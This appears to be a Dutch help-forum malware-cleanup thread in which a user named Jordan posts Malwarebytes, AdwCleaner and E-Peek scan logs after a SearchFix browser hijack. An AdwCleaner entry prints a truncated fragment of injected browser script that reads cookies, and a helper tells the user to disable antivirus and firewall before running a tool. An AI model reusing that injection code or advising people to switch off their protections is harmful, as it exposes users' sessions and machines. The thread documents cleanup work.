Do not forget to turn off your "smileys".

If your start page was hijacked as well, set up the search engine again.

By default AdwCleaner resets it to Google.com.


Malwarebytes Anti-Malware

www.malwarebytes.org

Scandatum: 30-11-2014

Scantijd: 6:10:26

Logbestand: malwarebite 30-11-2014.txt

Beheerder: Ja

Versie: 2.00.3.1025

Malwaredatabase: v2014.11.30.02

Rootkitdatabase: v2014.11.29.01

Licentie: Gratis

Malwarebescherming: Uitgeschakeld

Kwaadaardige Website Bescherming: Uitgeschakeld

Zelfbescherming: Uitgeschakeld

Besturingssysteem: Windows 7 Service Pack 1

Processor: x64

Bestandssysteem: NTFS

Gebruiker: Jordan

Scantype: Bedreigingsscan

Resultaat: Voltooid

Objecten Gescand: 322974

Verstreken Tijd: 4 u, 12 m, 57 s

Geheugen: Ingeschakeld

Opstarten: Ingeschakeld

Bestandssysteem: Ingeschakeld

Archieven: Ingeschakeld

Rootkits: Ingeschakeld

Heuristiek: Ingeschakeld

POP: Waarschuwen

POA: Ingeschakeld

Processen: 0

(Geen kwaadaardige items gedetecteerd)

Modules: 0

(Geen kwaadaardige items gedetecteerd)

Registersleutels: 1

PUP.Optional.WebSearchInfo, HKU\S-1-5-21-4250213819-786104705-630478919-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}, , [2d5e59e8aad2f83e049d5c488d775ba5],

Registerwaardes: 1

PUP.Optional.WebSearchInfo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DefaultScope, {BB74DE59-BC4C-4172-9AC4-73315F71CFFE}, , [2d5e44fdb6c670c6c282febc10f432ce]

Registerdata: 1

PUP.Optional.SearchFix.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, http://websearch.searchfix.info/?unqvl=63&idate=2014/11/25, Goed: (www.google.com), Slecht: (http://websearch.searchfix.info/?unqvl=63&idate=2014/11/25),,[4e3d88b97ffdb38353eefb541fe649b7]

Mappen: 1

PUP.Optional.BuyNSave.A, C:\Program Files (x86)\BuyNsave, , [b0dbb1908cf0092d625e56e9ff04629e],

Bestanden: 3

PUP.Optional.BuyNSave.A, C:\Program Files (x86)\BuyNsave\vBKaHnwe1rnDZN.dat, , [b0dbb1908cf0092d625e56e9ff04629e],

PUP.Optional.SearchFix.A, C:\Users\Jordan\AppData\Roaming\Mozilla\Firefox\Profiles\aksqjff7.default\prefs.js, Goed: (), Slecht: (user_pref("browser.startup.homepage", "http://websearch.searchfix.info/?unqvl=63&idate=2014/11/25");), ,[a6e52819572562d41953f39db5505ba5]

PUP.Optional.SearchFix.A, C:\Users\Jordan\AppData\Roaming\Mozilla\Firefox\Profiles\aksqjff7.default\prefs.js, Goed: (), Slecht: (user_pref("keyword.URL", "http://websearch.searchfix.info/?unqvl=63&idate=2014/11/25&l=1&q=");), ,[dcaf69d8cab275c177f7b5db0500f30d]

Fysieke Sectoren: 0

(Geen kwaadaardige items gedetecteerd)

(end)

C:\ProgramData\13031386700010600142\cd5b15e575e1c3d03e6999ee334c64eb.ini->C:\AdwCleaner\Quarantine\C\ProgramData\13031386700010600142\cd5b15e575e1c3d03e6999ee334c64eb.ini.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\manifest.json->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\manifest.json.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\privdog\ui\options.html->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\privdog\ui\options.html.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\privdog\ui\panel.html->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\privdog\ui\panel.html.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\background.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\background.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\backgroundHandlers.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\backgroundHandlers.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\backgroundSession.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\backgroundSession.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\backgroundUtils.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\backgroundUtils.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\bing.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\bing.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\configLoader.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\configLoader.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\content.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\content.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contentHandlers.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contentHandlers.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contentSession.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contentSession.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contentUtils.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contentUtils.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contextMenu.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\contextMenu.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\demon.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\demon.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\infoLookup.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\infoLookup.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\localConfig.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\localConfig.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\messaging.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\messaging.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\options.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\options.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\panel.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\panel.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\panelPre.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\panelPre.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\privdogrequest_module.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\js\privdogrequest_module.js.vir


The last scan, the adware one, took a very long time, so long that nothing happened anymore; I then just clicked remove and then it continued.

- - - Updated - - -

And I also still had this one saved separately, as I found out later.

# AdwCleaner v3.012 - Report created 17/11/2013 at 08:53:56

# Updated 11/11/2013 by Xplode

# Operating System : Windows 7 Ultimate Service Pack 1 (64 bits)

# Username : Jordan - ACER-LAPTOP

# Running from : C:\Users\Jordan\Downloads\AdwCleaner.exe

# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

***** [ Browsers ] *****

-\\ Internet Explorer v10.0.9200.16736

-\\ Mozilla Firefox v25.0.1 (nl)

[ File : C:\Users\Jordan\AppData\Roaming\Mozilla\Firefox\Profiles\7d6fgpw2.default\prefs.js ]

*************************

AdwCleaner[R0].txt - [772 octets] - [21/10/2013 07:12:57]

AdwCleaner[R1].txt - [833 octets] - [17/11/2013 08:53:05]

AdwCleaner[s0].txt - [755 octets] - [17/11/2013 08:53:56]

########## EOF - C:\AdwCleaner\AdwCleaner[s0].txt - [814 octets] ##########

# AdwCleaner v4.102 - Rapport aangemaakt 30/11/2014 op 11:13:02

# Laatste Update 23/11/2014 door Xplode

# Database : 2014-11-27.1 [Live]

# Besturingssysteem : Windows 7 Ultimate Service Pack 1 (64 bits)

# Gebruikersnaam : Jordan - ACER-LAPTOP

# Gestart vanuit : C:\Users\Jordan\Desktop\adwcleaner_4.102.exe

# Optie : Verwijderen

***** [ Services ] *****

***** [ Bestanden / Mappen ] *****

Map Verwijderd : C:\ProgramData\13031386700010600142

Map Verwijderd : C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja

***** [ Taken ] *****

***** [ Snelkoppelingen ] *****

***** [ Register ] *****

Sleutel Verwijderd : HKCU\Software\AVG Secure Search

Sleutel Verwijderd : HKCU\Software\Myfree Codec

Sleutel Verwijderd : HKLM\SOFTWARE\Myfree Codec

Sleutel Verwijderd : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00B2-0409-0000-0000000FF1CE}

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17420

-\\ Mozilla Firefox v33.1 (x86 nl)

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("browser.search.defaultenginename", "WebSearch");

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("browser.search.defaultenginename,S", "WebSearch");

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("browser.search.defaulturl", "hxxp://websearch.searchfix.info/?unqvl=63&idate=2014/11/25&l=1&q=");

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("browser.search.order.1", "WebSearch");

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("browser.search.order.1,S", "WebSearch");

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("browser.search.selectedEngine", "WebSearch");

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("browser.search.selectedEngine,S", "WebSearch");

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("extensions.ZkREesY6Zt66B0Tr.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.index[...]

-\\ Comodo Dragon v

[C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Web Data] - Verwijderd [search Provider] : hxxp://websearch.searchfix.info/?unqvl=63&idate=2014/11/25&l=1&q={searchTerms}

[C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\preferences] - Verwijderd [startup_URLs] : hxxp://websearch.searchfix.info/?unqvl=63&idate=2014/11/25

*************************

AdwCleaner[R0].txt - [772 octets] - [21/10/2013 07:12:57]

AdwCleaner[R1].txt - [3373 octets] - [17/11/2013 08:53:05]

AdwCleaner[R2].txt - [2903 octets] - [30/11/2014 10:43:33]

AdwCleaner[R3].txt - [2906 octets] - [30/11/2014 10:44:10]

AdwCleaner[R4].txt - [2964 octets] - [30/11/2014 10:53:51]

AdwCleaner[s0].txt - [3711 octets] - [17/11/2013 08:53:56]

########## EOF - C:\AdwCleaner\AdwCleaner[s0].txt - [3771 octets] ##########


An AdwCleaner scan from a few days ago is of no use to me. It does not give me a representative picture.

So run this scan again and post the log.

Next...

Extra note... Make sure your security software is disabled while installing and using E-Peek.

This is because these scanners wrongly flag certain components that E-Peek uses as infected and will block E-Peek.

Look here if you do not know how to disable your antivirus, firewall and/or antispyware scanner.

Download E-PeekSetup.exe to your desktop.

Double-click it and follow the instructions.

At the end of the installation, E-Peek will start.

Click OK on the first screen and then "Scan".

Post the log.


E-Peek v 1.0.5.6 © Emphyrio/Onsia Patrick 2013-2014

Downloaded @E Dev

Run at ma 1 dec 2014 17:23

.

Windows 7 Ultimate SP 1 (64 bits)

C:\Windows [NTFS - Fixed]

Default Browser: Internet Explorer

Boot mode: Normal boot

User logged in: Jordan

.

Java x86: n/a

Java x64: n/a

.

AV : AVG AntiVirus Free Edition 2015 [updated - Not Running]

AS : Windows Defender [updated - Running]

AS : AVG AntiVirus Free Edition 2015 [updated - Not Running]

FW : Windows firewall

.

==================== Files and Folders history=================================

Folders Created Last7 days :

30-11-2014 #####r-h-s-d+a- C:\Users\Jordan\AppData\Roaming\EurekaLab s.a.s

30-11-2014 #####r-h-s-d+a- C:\Program Files (x86)\Malwarebytes Anti-Malware

29-11-2014 #####r-h-s-d+a+ C:\cce_linux

28-11-2014 #####r-h-s-d+a- C:\rsit

28-11-2014 #####r-h-s-d+a- C:\ProgramData\Emsisoft

28-11-2014 #####r-h-s-d+a- C:\Program Files\trend micro

28-11-2014 #####r-h-s-d+a- C:\Program Files (x86)\Emsisoft Anti-Malware

25-11-2014 #####r-h-s-d+a- C:\ProgramData\HitmanPro

25-11-2014 #####r-h-s-d+a- C:\ProgramData\fglelgmopjjbdjgcgecdmkpfdagmmgef

25-11-2014 #####r-h-s-d+a- C:\Program Files (x86)\ESET

01-12-2014 #####r-h-s-d+a- C:\Program Files (x86)\E Dev

Files Modified Last 7days :

29-11-2014 01698222r-h-s-d-a+ C:\Windows\system32\PerfStringBackup.INI

29-11-2014 00755776r-h-s-d-a+ C:\Windows\system32\perfh013.dat

29-11-2014 00662908r-h-s-d-a+ C:\Windows\system32\perfh009.dat

29-11-2014 00185724r-h-s-d-a+ C:\Windows\system32\avgrep.txt

29-11-2014 00158514r-h-s-d-a+ C:\Windows\system32\perfc013.dat

29-11-2014 00126038r-h-s-d-a+ C:\Windows\system32\perfc009.dat

28-11-2014 00411600r-h-s-d-a+ C:\Windows\system32\FNTCACHE.DAT

27-11-2014 04443312r-h-s-d-a+ C:\Windows\SysWOW64\FlashPlayerInstaller.exe

27-11-2014 00701104r-h-s-d-a+ C:\Windows\SysWOW64\FlashPlayerApp.exe

27-11-2014 00071344r-h-s-d-a+ C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

25-11-2014 00004786r-h-s-d-a+ C:\Windows\system32\.crusader

01-12-2014 00026576r-h+s-d-a+ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

01-12-2014 00026576r-h+s-d-a+ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

01-12-2014 00000029r-h-s-d-a+ C:\Windows\SysWOW64\TempWmicBatchFile.bat

Files Created Last 7days :

29-11-2014 01938136r-h+s-d-a+ C:\Users\Jordan\AppData\Local\IconCache.db

29-11-2014 00185724r-h-s-d-a+ C:\Windows\system32\avgrep.txt

28-11-2014 00411600r-h-s-d-a+ C:\Windows\system32\FNTCACHE.DAT

28-11-2014 00109296r-h-s-d-a+ C:\Users\Jordan\AppData\Local\GDIPFONTCACHEV1.DAT

27-11-2014 04443312r-h-s-d-a+ C:\Windows\SysWOW64\FlashPlayerInstaller.exe

25-11-2014 00004786r-h-s-d-a+ C:\Windows\system32\.crusader

01-12-2014 00000109r-h-s-d-a+ C:\ProgramData\Microsoft.SqlServer.Compact.351.64.bc

==================== RUNNING PROCESSES=========================================

[AdminService] -SYSTEM- C:\Program Files (x86)\BluetoothSuite\adminservice.exe - (Qualcomm Atheros Commnucations)

[AmIcoSinglun64] -Jordan- C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe - (Alcor Micro Corp.)

[armsvc] -SYSTEM- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe - (Adobe Systems Incorporated)

[atieclxx] -SYSTEM- C:\Windows\system32\atieclxx.exe - (AMD)

[atiesrxx] -SYSTEM- C:\Windows\system32\atiesrxx.exe - (AMD)

[avgui] -Jordan- C:\Program Files (x86)\AVG\AVG2015\avgui.exe - (AVG Technologies CZ, s.r.o.)

[avgwdsvc] -SYSTEM- C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe - (AVG Technologies CZ, s.r.o.)

[boostSpeed] -Jordan- C:\Program Files (x86)\Auslogics\BoostSpeed\BoostSpeed.exe - (Auslogics)

[btTray] -Jordan- C:\Program Files (x86)\BluetoothSuite\BtTray.exe - (Qualcomm Atheros)

[btvStack] -Jordan- C:\Program Files (x86)\BluetoothSuite\BtvStack.exe - (Qualcomm Atheros Commnucations)

[CCleaner64] -Jordan- C:\Program Files\CCleaner\CCleaner64.exe - (Piriform Ltd)

[cronsvc] -SYSTEM- C:\Prey\platform\windows\cronsvc.exe - (Fork Ltd.)

[csrss] -SYSTEM- C:\Windows\system32\csrss.exe - (Microsoft Corporation)

[csrss] -SYSTEM- C:\Windows\system32\csrss.exe - (Microsoft Corporation)

[ctfmon] -Jordan- C:\Windows\SysWOW64\ctfmon.exe - (Microsoft Corporation)

[CxAudMsg64] -SYSTEM- C:\Windows\system32\CxAudMsg64.exe - (Conexant Systems Inc.)

[Dropbox] -Jordan- C:\Users\Jordan\AppData\Roaming\Dropbox\bin\Dropbox.exe - (Dropbox, Inc.)

[dwm] -Jordan- C:\Windows\system32\Dwm.exe - (Microsoft Corporation)

[E-Peek 1.0.5] -Jordan- C:\Program Files (x86)\E Dev\E-Peek\E-Peek 1.0.5.exe - (E Dev)

[E-Peek 1.0.5] -Jordan- C:\Program Files (x86)\E Dev\E-Peek\E-Peek 1.0.5.exe - (E Dev)

[ETDCtrl] -Jordan- C:\Program Files\Elantech\ETDCtrl.exe - (ELAN Microelectronics Corp.)

[ETDCtrlHelper] -Jordan- C:\Program Files\Elantech\ETDCtrlHelper.exe - (ELAN Microelectronics Corp.)

[explorer] -Jordan- C:\Windows\Explorer.EXE - (Microsoft Corporation)

[firefox] -Jordan- C:\Program Files (x86)\Mozilla Firefox\firefox.exe - (Mozilla Corporation)

[FlashUtil64_15_0_0_239_ActiveX] -Jordan- C:\Windows\system32\Macromed\Flash\FlashUtil64_15_0_0_239_ActiveX.exe - (Adobe Systems Incorporated)

[GoogleCrashHandler] -SYSTEM- C:\Program Files (x86)\Google\Update\1.3.25.11\GoogleCrashHandler.exe - (Google Inc.)

[GoogleCrashHandler64] -SYSTEM- C:\Program Files (x86)\Google\Update\1.3.25.11\GoogleCrashHandler64.exe - (Google Inc.)

[iexplore] -Jordan- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE - (Microsoft Corporation)

[iexplore] -Jordan- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE - (Microsoft Corporation)

[iexplore] -Jordan- C:\Program Files\Internet Explorer\iexplore.exe - (Microsoft Corporation)

[lsass] -SYSTEM- C:\Windows\system32\lsass.exe - (Microsoft Corporation)

[lsm] -SYSTEM- C:\Windows\system32\lsm.exe - (Microsoft Corporation)

[psia] -SYSTEM- C:\Program Files (x86)\Secunia\PSI\PSIA.exe - (Secunia)

[searchIndexer] -SYSTEM- C:\Windows\system32\SearchIndexer.exe - (Microsoft Corporation)

[services] -SYSTEM- C:\Windows\system32\services.exe - (Microsoft Corporation)

[smss] -SYSTEM- C:\Windows\system32\smss.exe - (Microsoft Corporation)

[spoolsv] -SYSTEM- C:\Windows\System32\spoolsv.exe - (Microsoft Corporation)

[sppsvc] -NETWORK SERVICE- C:\Windows\system32\sppsvc.exe - (Microsoft Corporation)

[sua] -SYSTEM- C:\Program Files (x86)\Secunia\PSI\sua.exe - (Secunia)

[taskeng] -Jordan- C:\Windows\system32\taskeng.exe - (Microsoft Corporation)

[taskeng] -SYSTEM- C:\Windows\system32\taskeng.exe - (Microsoft Corporation)

[taskhost] -Jordan- C:\Windows\system32\taskhost.exe - (Microsoft Corporation)

[TeamViewer_Service] -SYSTEM- C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe - (TeamViewer GmbH)

[thunderbird] -Jordan- C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe - (Mozilla Corporation)

[TrustedInstaller] -SYSTEM- C:\Windows\servicing\TrustedInstaller.exe - (Microsoft Corporation)

[VirtualRouterService] -SYSTEM- C:\Program Files (x86)\Virtual Router\VirtualRouterService.exe - (Chris Pietschmann(Chris Pietschmann | husband, father, hacker, entrepreneur, futurist, innovator, autodidact))

[wininit] -SYSTEM- C:\Windows\system32\wininit.exe - (Microsoft Corporation)

[winlogon] -SYSTEM- C:\Windows\system32\winlogon.exe - (Microsoft Corporation)

[WinPatrol] -Jordan- C:\Program Files (x86)\BillP Studios\WinPatrol\WinPatrol.exe - (BillP Studios)

[WLIDSVC] -SYSTEM- C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE - (Microsoft Corp.)

[WLIDSVCM] -SYSTEM- C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe - (Microsoft Corp.)

[WmiPrvSE] -NETWORK SERVICE- C:\Windows\system32\wbem\wmiprvse.exe - (Microsoft Corporation)

[wmpnetwk] -NETWORK SERVICE- C:\Program Files\Windows Media Player\wmpnetwk.exe - (Microsoft Corporation)

==================== IE PAGES==================================================

IE02 - HKCU\Software\Microsoft\Internet Explorer\Main @Start Page = hxxp://www.google.nl

IE02 - HKCU\Software\Microsoft\Internet Explorer\Main @Local Page = C:\Windows\system32\blank.htm

IE02 - HKCU\Software\Microsoft\Internet Explorer\Main @Search Page = hxxp://www.google.com

IE02 - HKCU\Software\Microsoft\Internet Explorer\Main @Default_Page_URL = hxxp://www.google.com/ie

IE03 - HKCU\Software\Microsoft\Internet Explorer\SearchUrl @Default = hxxp://www.google.com/search?q=%s

IE04 - HKCU\..\SearchScopes{0D67C3C0-B2E3-4080-A22D-914BABC18C12} @ DisplayName: [ZIE.nl (video’s)] @ URL= hxxp://www.zie.nl/search/videos/{searchTerms}&origin=nu_ie8

IE04 - HKCU\..\SearchScopes{29AC26E3-2C87-454A-A64F-C08F599A54F2} @ DisplayName: [eBay] @ URL =hxxp://rover.ebay.com/rover/1/1346-71133-23097-1/4?satitle={searchTerms}

IE04 - HKCU\..\SearchScopes{92AB0653-4D91-437C-8D9C-D05921804245} @ DisplayName: [Google] @ URL = hxxps://www.google.com/search?q={searchTerms}

IE05 - HKCU\..\URLSearchHooks @{CFBFAE00-17A6-11D0-99CB-00C04FD64497} = C:\Windows\SysWOW64\ieframe.dll

IE08 - HKLM\Software\Microsoft\Internet Explorer\Main @Start Page = Google

IE08 - HKLM\Software\Microsoft\Internet Explorer\Main @Default_Page_URL = hxxp://go.microsoft.com/fwlink/p/?LinkId=255141

IE08 - HKLM\Software\Microsoft\Internet Explorer\Main @Default_Search_URL = hxxp://go.microsoft.com/fwlink/?LinkId=54896

IE08 - HKLM\Software\Microsoft\Internet Explorer\Main @Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896

IE10 - HKLM\..\SearchScopes{0633EE93-D776-472f-A0FF-E1416B8B2E3A} @ DisplayName: [@ieframe.dll,-12512] @URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

IE02 x64 - HKCU\Software\Microsoft\Internet Explorer\Main @Start Page = hxxp://www.google.nl

IE02 x64 - HKCU\Software\Microsoft\Internet Explorer\Main @Local Page = C:\Windows\system32\blank.htm

IE02 x64 - HKCU\Software\Microsoft\Internet Explorer\Main @Search Page = hxxp://www.google.com

IE02 x64 - HKCU\Software\Microsoft\Internet Explorer\Main @Default_Page_URL = hxxp://www.google.com/ie

IE03 x64 - HKCU\Software\Microsoft\InternetExplorer\SearchUrl @ Default = hxxp://www.google.com/search?q=%s

IE04 x64 - HKCU\Software\Microsoft\InternetExplorer\SearchScopes @ DefaultScope = {92AB0653-4D91-437C-8D9C-D05921804245}

IE04 x64 - HKCU\..\SearchScopes{0D67C3C0-B2E3-4080-A22D-914BABC18C12} @ DisplayName: [ZIE.nl (video’s)] @ URL= hxxp://www.zie.nl/search/videos/{searchTerms}&origin=nu_ie8

IE04 x64 - HKCU\..\SearchScopes{29AC26E3-2C87-454A-A64F-C08F599A54F2} @ DisplayName: [eBay] @ URL =hxxp://rover.ebay.com/rover/1/1346-71133-23097-1/4?satitle={searchTerms}

IE04 x64 - HKCU\..\SearchScopes {92AB0653-4D91-437C-8D9C-D05921804245}@ DisplayName: [Google] @ URL = hxxps://www.google.com/search?q={searchTerms}

IE05 x64 - HKCU\..\URLSearchHooks @{CFBFAE00-17A6-11D0-99CB-00C04FD64497} = C:\Windows\System32\ieframe.dll

IE08 x64 - HKLM\Software\Microsoft\Internet Explorer\Main @Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=255141

IE08 x64 - HKLM\Software\Microsoft\Internet Explorer\Main @Local Page = C:\Windows\System32\blank.htm

IE08 x64 - HKLM\Software\Microsoft\Internet Explorer\Main @Default_Page_URL = hxxp://go.microsoft.com/fwlink/p/?LinkId=255141

IE08 x64 - HKLM\Software\Microsoft\Internet Explorer\Main @Default_Search_URL = hxxp://go.microsoft.com/fwlink/?LinkId=54896

IE08 x64 - HKLM\Software\Microsoft\Internet Explorer\Main @Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896

IE10 x64 - HKLM\Software\Microsoft\InternetExplorer\SearchScopes @ DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE10 x64 - HKLM\..\SearchScopes{0633EE93-D776-472f-A0FF-E1416B8B2E3A} @ DisplayName: [@ieframe.dll,-12512] @URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

==================== Auto Load=================================================

AL00 - HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon @ Userinit = userinit.exe,

